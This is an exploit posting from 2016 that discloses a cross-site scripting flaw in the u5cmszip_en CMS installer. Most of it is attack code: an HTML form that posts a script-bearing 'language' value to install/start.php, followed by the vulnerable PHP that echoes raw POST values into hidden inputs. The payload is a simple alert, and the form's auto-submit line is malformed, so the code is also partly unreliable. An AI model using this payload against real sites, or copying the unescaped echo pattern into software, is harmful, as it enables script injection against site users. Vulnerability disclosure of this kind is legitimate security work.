|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title: u5cmszip_en Cms Cross Site Scripting |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://yuba.ch/ |[+] |[+] Download Link : http://yuba.ch/f.php?f=r/u5cmszip/u5cmszip_en.zip?t=1479045196 |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: 12 /27 / 2016 |=============================================================| |[+] Exploit Code: <html> <head><title>Cross Site Scripting</title></head> <body> <form action="http://127.0.0.1/3/CMS/install/start.php" method="post" name="installation_step0"> <select name="language" class="language"> <option value="de">deutsch</option> <option value="en" selected="selected">english</option> <option value="es">spanish</option> </select> <input type="hidden" name="language" id="language" value="en'"()&%<acx><ScRiPt>alert(123)</ScRiPt>" /> </form> <script language="Javascript"> setTimeout('http://127.0.0.1/3/CMS/install/start.php.submit()', 1); </script> </body> </html> ============================================================ Vulnerable code : <form action="step1.php" method="post" name="installation_step0"> <h4>Please choose a language | Bitte w&auml;hlen Sie eine Sprache | Porfavor elig&eacute; una idioma:</h4> <select name="language" class="language"> <?php $countries = shortTag_countries(); foreach ($countries as $country => $iso) { print "<option value="{$iso}"" . (strtolower($iso) == $http_lang? 'selected="selected"': '') . ">" . htmlentities($country) . "</option>\n"; } ?> </select> <?php foreach ( $_POST as $key => $value ) { ?> <?php if ( !strpos($key, 'password') ) { ?> <input type="hidden" name="<?php echo $key ?>" id="<?php echo $key ?>" value="<?php echo $value ?>" /> <?php } } ?> <input type="image" src="button_next.gif" alt="next" title="Next step" align="right" border="0" /> </form> |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|